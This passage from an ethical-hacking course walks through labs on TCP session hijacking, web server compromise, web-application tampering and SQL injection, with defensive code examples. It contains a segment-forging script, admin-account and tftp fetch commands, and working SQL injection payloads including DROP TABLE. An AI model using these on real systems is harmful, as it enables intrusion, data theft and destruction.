As we know from sniffing (eavesdropping on the network), a hacker can capture any information that is not encrypted, or use a fake CA to read HTTPS traffic; now we add one more technique, session hijacking. To perform this lab we first have to ARP-spoof, then use the T-sight or Hunt software to take over the session from the victim machine.

II/ Performing the lab

In this lab the author uses VMware, with the physical machine used to test TELNET and SSH. Of the remaining two machines, one runs Windows 2000 (with T-sight preinstalled) and one runs Linux to test SSH.

Installing the software is fairly easy; you need to add the driver component and switch to the 192.168.200.0/24 range because the trial version is being used.
After installation, configure the machine 192.168.200.1 to allow telnet from other machines, and telnet from 192.168.200.2 to 192.168.200.1.

With the data captured from 192.168.200.2, use the Take Over feature in T-sight to seize the session.
Once the session is taken over, the Telnet session on the client gets a Lost connection, and in this case the user has no way of knowing why the connection was lost. Now start the SSH service on the Linux machine with service sshd start and try session hijacking against SSH traffic. Because SSH encrypts and integrity-protects the stream, taking over the TCP connection cannot inject meaningful commands; at most the session is torn down.
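What T-sight's Take Over does on the wire, as an added example (this is not the tool's code): once ARP spoofing has put the attacker in the path, the tool reads the last client-to-server segment and sends a forged one with the client's addresses and ports, the client's next sequence number and the attacker's data. The block builds that segment with a correct TCP checksum and parses it back; delivering it needs a raw socket and is not included. The addresses are the lab's 192.168.200.x hosts; the ports, sequence numbers and Telnet payloads are constructed for the example.

```python
"""The segment a session-hijacking tool injects, built and checked by hand.

Added example, not T-sight or Hunt code. With ARP spoofing placing the attacker
in the path, "Take Over" comes down to this: read the last client->server
segment, then send one that carries the client's addresses and ports, the
client's next sequence number (seq + payload length), the same ack, and the
attacker's data. The server accepts it and replies; the real client is now
len(data) bytes behind what the server expects, so its own segments are
rejected and the Telnet session ends with Lost connection. Delivering the
segment needs a raw socket (not included); building it does not.
"""
import socket
import struct

TCP_PSH_ACK = 0x18
TCP_HDR = "!HHIIHHHH"   # sport, dport, seq, ack, offset/flags, window, checksum, urgent


def inet_checksum(data: bytes) -> int:
    """Ones'-complement sum of 16-bit words (RFC 1071), odd length zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def pseudo_header(src_ip: str, dst_ip: str, tcp_len: int) -> bytes:
    """IPv4 pseudo-header the TCP checksum covers: src, dst, zero, proto 6, TCP length."""
    return struct.pack("!4s4sBBH", socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
                       0, 6, tcp_len)


def build_tcp_segment(src_ip, dst_ip, sport, dport, seq, ack, payload,
                      flags=TCP_PSH_ACK, window=8192) -> bytes:
    """20-byte header without options; checksum over pseudo-header + header + payload."""
    offset_flags = (5 << 12) | flags            # data offset 5 words, reserved 0
    hdr = struct.pack(TCP_HDR, sport, dport, seq, ack, offset_flags, window, 0, 0)
    csum = inet_checksum(pseudo_header(src_ip, dst_ip, len(hdr) + len(payload)) + hdr + payload)
    hdr = struct.pack(TCP_HDR, sport, dport, seq, ack, offset_flags, window, csum, 0)
    return hdr + payload


def verify_tcp_checksum(src_ip, dst_ip, segment: bytes) -> bool:
    """With the checksum field in place, the recomputed sum of a valid segment is 0."""
    return inet_checksum(pseudo_header(src_ip, dst_ip, len(segment)) + segment) == 0


def parse_tcp_header(segment: bytes) -> dict:
    """Decode the fixed header and return the payload that follows it."""
    sport, dport, seq, ack, off_flags, window, csum, urg = struct.unpack(TCP_HDR, segment[:20])
    hlen = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": off_flags & 0x1FF, "window": window, "payload": segment[hlen:]}


def hijack_segment(observed: bytes, client_ip: str, server_ip: str, data: bytes) -> bytes:
    """From a sniffed client->server segment, forge the next one the server will accept."""
    o = parse_tcp_header(observed)
    next_seq = (o["seq"] + len(o["payload"])) & 0xFFFFFFFF
    return build_tcp_segment(client_ip, server_ip, o["sport"], o["dport"],
                             next_seq, o["ack"], data)


if __name__ == "__main__":
    # Constructed stand-in for the sniffed Telnet segment 192.168.200.2 -> 192.168.200.1.
    sniffed = build_tcp_segment("192.168.200.2", "192.168.200.1", 40000, 23, 1000, 5000, b"ls\r\n")
    forged = hijack_segment(sniffed, "192.168.200.2", "192.168.200.1", b"id\r\n")
    print(parse_tcp_header(forged), verify_tcp_checksum("192.168.200.2", "192.168.200.1", forged))
```

The forged segment is indistinguishable from the client's next one at the TCP level, which is why Telnet, with no integrity protection above TCP, is hijackable and SSH, whose MAC covers every byte of the stream, is not.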
Lesson 9:
Hacking Web Server

I/ Introduction:
Normally, to hack a web server a hacker first looks at which operating system the server runs and which services run on it. Common operating systems are Windows 2000 Server, Windows 2003 Server, Red Hat, etc.; the services include Apache, IIS, FTP servers, etc. If one of the operating system's services, or another service, has a flaw, it can lead to loss of control of the system. In this section's exercises the author introduces an operating-system flaw, DCOM, and application flaws in Serv-U (an FTP server) and Apache. Through these flaws we can take complete control of the victim machine.

II/ Performing the lab

Lab 1: Attacking a Windows 2003 web server (Apache flaw)

To find out whether the system's server is vulnerable, we use a scanner to check (covered earlier in the Scanning lesson).
We see no information about the FTP server here, because Retina only identifies Microsoft services and the common services; less common services are shown only as open ports. In this case we see port 21 open.

We use Metasploit to exploit the Apache flaw and obtain a console (shell). Retina's findings for the target:
Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
Now we try to get Remote Desktop access to the machine 192.168.200.1. First create a user and add it to the Administrators group with the following commands:

net user vsichao vsichao /add                (add the user)
net localgroup Administrators vsichao /add   (put the user in the Administrators group)

Check with net user vsichao (or net localgroup Administrators) whether the user has admin rights.

Next, try Remote Desktop to the machine with mstsc /v:192.168.200.6. If that does not work, use the Openrdp.vbs file to enable Remote Desktop. Run the Cisco TFTP Server program on the attacking machine to serve this file to the victim server.

Use the tftp command on the victim to fetch the file (tftp -i <attacker IP> GET Openrdp.vbs, where <attacker IP> is the machine running the TFTP server).
Adding the user and raising it to Administrator.

Remote Desktop login with the user cehclass succeeds, so we have full control of the victim machine.
Lab 2: Exploiting the Serv-U application flaw

As in the previous lab, use nmap to determine the Serv-U version and Metasploit to attack it.
Lesson 10:
WEB APPLICATION HACKING

I/ Introduction:
Web applications normally use input data from HTTP requests (or from files) to determine their response. An attacker can modify any part of an HTTP request, including the URL, query string, headers, cookies, form fields and even hidden fields, to bypass security mechanisms. Common attacks of this type include:

- Arbitrary operating-system command execution
- Cross site scripting
- Buffer overflow
- Format string attacks
- SQL injection
- Cookie poisoning
- Hidden field manipulation

In this exercise we try to exploit Cross Site Scripting, Insufficient Data Validation, Cookie Manipulation and Authorization Failure.
II/ Labs

Lab 1: Cross Site Scripting

First log in with username jv and password jv789 and choose the post message function. Then post a script in the message text field.
Then submit the post. Press F5 to refresh the browser and the script's effect appears.

At this point the victim's browser unknowingly executes the script the user posted to the server. With such a script an attacker can steal the victim's cookie and log in to the system.

Lab 2: Insufficient Data Validation

In this lab, when transferring money from one account to another, the amount parameter must always be greater than 0. However, a hacker can change this number to a negative value with an HTTP proxy, which can damage HackmeBank's finances.

Try transferring Amount 100 from any account to another account.

The result is successful. Transfer once more, but with the value -100. Because the check is done on the client side, this transfer fails.
Now use WebScarab as an HTTP proxy and change the parameter being POSTed to the server.

The server's response shows that the transfer still succeeded.
Checking Transactions shows that the transfer was recorded.

Lab 3: Cookie Manipulation

During login, we see a CookieloginAttempts parameter in the cookie, used to lock the session when someone tries to log in with a wrong or unknown password. It counts down from 5 to 0, and at 0 the session is locked. We can use WebScarab to change this parameter and prevent the server from locking the session: a lockout counter that lives in the client's cookie is under the attacker's control, so the counter must be kept on the server.
Lab 4: Authorization Failure

First view the accounts of user jc, password jc789.

The account numbers are 5204320422040005, 5204320422040006, 5204320422040007 and 5204320422040008. User jc can only manage the accounts listed above. Now look at the URL when using the View Transaction feature.
Replace 5204320422040005 with 5204320422040004 (an account that does not belong to user jc), and the transactions are shown anyway. So the web site has an authorization flaw: the account number in the URL is trusted without checking that it belongs to the logged-in user.
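The server-side versions of the four checks HackmeBank leaves to the browser (the escaping for Lab 1, the amount check for Lab 2, the attempt counter for Lab 3 and the ownership check for Lab 4), as an added example that is not HackmeBank's code. The users jv/jc, the account numbers and the 5-attempt limit follow the labs; the balances, the session dictionary and the in-memory storage are this example's own.

```python
"""Server-side versions of the checks HackmeBank leaves to the browser.

Added example, not HackmeBank's code. Labs 1-4 above all succeed for one reason:
the server trusts what the client sends (a message body, an amount that the
page's JavaScript already validated, a loginAttempts cookie, an account number
in the URL). This minimal in-memory service puts each check on the server,
where WebScarab cannot reach it. Users jv/jc, the account numbers and the
5-attempt limit follow the lab; balances, the session dict and the storage
layout are this example's own.
"""
from dataclasses import dataclass, field
from decimal import Decimal, InvalidOperation
import html

MAX_ATTEMPTS = 5


@dataclass
class Account:
    number: str
    owner: str
    balance: Decimal
    transactions: list = field(default_factory=list)


ACCOUNTS = {
    "5204320422040004": Account("5204320422040004", "jv", Decimal("1000.00")),
    "5204320422040005": Account("5204320422040005", "jc", Decimal("1000.00")),
    "5204320422040006": Account("5204320422040006", "jc", Decimal("500.00")),
}
PASSWORDS = {"jv": "jv789", "jc": "jc789"}   # plaintext only to keep the example short
FAILED_LOGINS = {}   # Lab 3: the counter lives here, not in a CookieloginAttempts cookie


def login(username: str, password: str):
    """Return a session dict, or None when the password is wrong or the account is locked."""
    if FAILED_LOGINS.get(username, 0) >= MAX_ATTEMPTS:
        return None                       # locked; nothing the client sends resets this
    if PASSWORDS.get(username) != password:
        FAILED_LOGINS[username] = FAILED_LOGINS.get(username, 0) + 1
        return None
    FAILED_LOGINS.pop(username, None)
    return {"user": username}


def transfer(session: dict, src: str, dst: str, amount_param: str):
    """Lab 2: re-validate the POSTed amount on the server. Returns (ok, balance_or_reason)."""
    try:
        amount = Decimal(amount_param)
    except InvalidOperation:
        return False, "amount is not a number"
    if amount <= 0:
        return False, "amount must be positive"    # the -100 from the proxy stops here
    if src not in ACCOUNTS or dst not in ACCOUNTS or src == dst:
        return False, "unknown account"
    a, b = ACCOUNTS[src], ACCOUNTS[dst]
    if a.owner != session["user"]:
        return False, "source account not owned by user"
    if a.balance < amount:
        return False, "insufficient funds"
    a.balance -= amount
    b.balance += amount
    a.transactions.append(("out", dst, amount))
    b.transactions.append(("in", src, amount))
    return True, a.balance


def view_transactions(session: dict, account_number: str):
    """Lab 4: the number in the URL is only a lookup key; ownership decides access."""
    acct = ACCOUNTS.get(account_number)
    if acct is None or acct.owner != session["user"]:
        return None                       # 5204320422040004 is not jc's: refused
    return list(acct.transactions)


def render_message(text: str) -> str:
    """Lab 1: store the post as typed, escape on output so a posted <script> is shown, not run."""
    return f"<p>{html.escape(text)}</p>"
```

Every check runs after the request has been parsed and before anything is written, and none of them reads a value the client could have edited in the proxy; that is the whole difference between the vulnerable application and this version.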
Lesson 11:
SQL INJECTION

I/ Introduction to SQL Injection:
This attack technique exploits flaws in the application (insufficient checking of the characters a user enters). It is carried out by adding code to SQL statements or queries (through text boxes) before they are passed to the web application; the server executes them and returns the result (query output or error messages) to the browser, from which the attacker can gather data, run commands (in some cases) and eventually take control of the system. Below are some basic tricks; the error messages are those of Microsoft SQL Server via ODBC.

1) Getting the current table and column names:
Structure:

Login page (or any injectable page):
username: ' having 1=1--

Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

So we have the table VICTIM (and its first column, ID).

Continue:

username: ' group by VICTIM.ID having 1=1--

Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

So we have the column Vuser. Keep adding each column found to the GROUP BY list until no error comes back; that gives every column of the query.

UNION: simple but effective

Yes, we can use it to get almost everything.

First, a quick look at its structure:

Login page:
username: ' Union select [column] from [table] where [column2=...]--
password: anything

Example: suppose we know that the username and password columns in table VTABLE of the victim database are VUSER and VPASS. Then we do the following:
username: ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
password: anything

(1): Here admin is a user you know; if you do not know one, leave the WHERE clause out and the query returns the first user.

Result:
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

This result means the UNION must select as many expressions as the application's own query does (the count that matters is the number of columns in the original SELECT, not the number of columns in VTABLE). Its structure is:

username: ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
password: anything

Keep adding ",1" until the result looks like:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'tuibihackroi' to a column of data type int.

So the password of user 'admin' is 'tuibihackroi'.

2) Getting every value of a known column in a known table

The trick here is NOT IN. Its structure is as follows (using the columns of the previous example); knowing the user admin, we can get the other users:

Login page:
username: ' Union select Vuser,1,1,1,1 from Vtable where Vuser not in ('admin')--

This gives us one more user; add it to the NOT IN list (e.g. not in ('admin','hacker',...)) and keep going until we have every user (and then, of course, every password).

**** To list only the user names that match a pattern of your choice, for example only users containing the word admin, use LIKE:

Login page:
username: ' Union select Vuser,1,1,1,1 from Vtable where Vuser not in ('admin') and Vuser like '%admin%'--

3) Getting all tables and columns of the database:
The key is this system view: INFORMATION_SCHEMA.TABLES with its column TABLE_NAME (lists every table), and INFORMATION_SCHEMA.COLUMNS with its column COLUMN_NAME (lists every column).
Usage with UNION:

Login page:
username: ' UNION SELECT TABLE_NAME,1,1,1,1 FROM INFORMATION_SCHEMA.TABLES WHERE ...--

(fill the WHERE clause with the NOT IN condition from section 2 to walk through the table names one at a time). This way we can get every table; once we have a table, we get all of its columns (padded to the same column count as before):

Login page:
username: ' UNION SELECT COLUMN_NAME,1,1,1,1 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='...' and ...--

These are the most basic things about SQL injection that I can give you; to do it well takes a little creativity too. I hope it helps you a bit when you come across a site vulnerable to SQL injection.

4) Without UNION:

If you would rather avoid UNION because of its inconveniences, you can use "convert" more easily to gather info through the error messages.

Structure:

login page:
user: ' + convert(int,(select @@version))--

The above is an example of getting the version; to get any other info, just replace "select @@version", but remember that convert needs a single value, so if the subquery can return several rows you must add TOP 1.

Example: user: ' + convert(int,(select Vpass from Vtable where Vuser='admin'))--

Note: if this does not work, it may be because the + sign is not accepted (in a URL it is decoded as a space); in that case replace it with %2b.

Example: user: ' %2b convert(int,(select Vpass from Vtable where Vuser='admin'))--

5) Running SQL commands:

To run a command you can use the ";" separator (stacked queries):

Structure:
login page:
user: '; [command]--

Example: '; DROP TABLE VTABLE--
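The UNION tricks from sections 1-3 and the parameterized query that defeats them, run against SQLite as an added example (this is not the course's lab, which targets SQL Server): the injection works identically in any SQL engine, only the error text differs. The table VTABLE with columns VUSER/VPASS, the user admin and the password 'tuibihackroi' are the page's own names; sqlite_master stands in for INFORMATION_SCHEMA.TABLES; the convert() error trick of section 4 is SQL Server-specific and is not reproduced, and the ';' stacked query of section 5 is refused here by Python's sqlite3 driver (one statement per execute() call), which is a property of the driver, not a defence the database provides.

```python
"""String-built vs parameterized login queries, with the page's UNION payloads, on SQLite.

Added example, not the course's lab. Sections 1-3 above read SQL Server error
text; the injection itself works identically in any SQL engine. sqlite_master
stands in for INFORMATION_SCHEMA.TABLES. Section 4's convert() error trick is
SQL Server-specific and is not reproduced; section 5's ';' stacked query is
refused here by Python's sqlite3 driver (one statement per execute()), which
is a driver property, not a defence the database provides.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Table and column names VTABLE/VUSER/VPASS and the admin password follow the text."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE VTABLE (ID INTEGER PRIMARY KEY, VUSER TEXT, VPASS TEXT, ROLE TEXT)")
    db.executemany("INSERT INTO VTABLE (VUSER, VPASS, ROLE) VALUES (?, ?, ?)",
                   [("admin", "tuibihackroi", "admin"), ("jc", "jc789", "user")])
    return db


def login_vulnerable(db, username: str, password: str) -> list:
    """The flaw: user input spliced into the SQL text. Returns the matched rows (4 columns)."""
    sql = ("SELECT ID, VUSER, VPASS, ROLE FROM VTABLE "
           f"WHERE VUSER = '{username}' AND VPASS = '{password}'")
    return db.execute(sql).fetchall()


def login_safe(db, username: str, password: str) -> list:
    """Same query with bound parameters: the quote and the -- stay inside the string value."""
    sql = "SELECT ID, VUSER, VPASS, ROLE FROM VTABLE WHERE VUSER = ? AND VPASS = ?"
    return db.execute(sql, (username, password)).fetchall()


# Payloads for the username field, as in the "username:" lines above.
BYPASS = "' OR 1=1--"                    # -- comments out "AND VPASS = '...'"
# Section 1: the UNION must select 4 expressions because the application's own
# SELECT has 4 (that is what the "equal number of expressions" error counts).
UNION_PASS = "' UNION SELECT 1,VPASS,1,1 FROM VTABLE WHERE VUSER='admin'--"
# Section 2: NOT IN paging, the next user after the ones already known.
UNION_NEXT_USER = "' UNION SELECT 1,VUSER,1,1 FROM VTABLE WHERE VUSER NOT IN ('admin')--"
# Section 3: schema dump; sqlite_master.name plays INFORMATION_SCHEMA.TABLES.TABLE_NAME.
UNION_TABLES = "' UNION SELECT 1,name,1,1 FROM sqlite_master WHERE type='table'--"


def extract(db, payload: str) -> list:
    """Run a UNION payload through the vulnerable login and return the leaked column."""
    return [row[1] for row in login_vulnerable(db, payload, "x")]


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, BYPASS, "x"))       # both rows: login bypassed
    print(extract(db, UNION_PASS))                 # ['tuibihackroi']
    print(extract(db, UNION_NEXT_USER))            # ['jc']
    print(extract(db, UNION_TABLES))               # ['VTABLE']
    print(login_safe(db, BYPASS, "x"))             # []: the payload is just a user name
```

The vulnerable and the safe function differ only in whether the user's text becomes part of the SQL or stays a bound value; no amount of filtering quotes in the text box replaces that distinction, since the same data can arrive through headers, cookies or URL parameters.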
II/ Lab exercise

In this lab the hacker (machine 192.168.1.44) attacks the Server 2000 machine through the web port (192.